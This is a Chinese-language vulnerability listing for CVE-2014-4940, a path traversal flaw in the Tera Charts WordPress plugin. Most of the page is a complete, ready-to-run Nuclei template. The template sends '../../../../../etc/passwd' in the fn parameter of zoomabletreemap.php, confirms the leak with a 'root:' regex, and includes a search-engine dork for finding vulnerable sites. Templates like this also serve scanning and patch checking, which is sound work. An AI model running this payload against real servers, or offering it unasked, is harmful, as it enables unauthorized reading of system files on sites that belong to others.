CVE-2014-4940: WordPress Plugin Tera Charts - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Plugin Tera Charts | POC: 已公开

漏洞描述

Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.

PoC代码[已公开]

id: CVE-2014-4940

info:
  name: WordPress Plugin Tera Charts - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4940
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
    - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4940
    cwe-id: CWE-22
    epss-score: 0.57666
    epss-percentile: 0.98106
    cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: tera_charts_plugin_project
    product: tera-charts
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/tera-charts"
  tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f53ebc19a53d7f84380793434b4b6dc6d77b25a34d2c07130b45f1a8199e1da002204d9b316d42c1143708b9ec29295c38ceb96886defc1cffbdc743c8e6ebf57dcb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐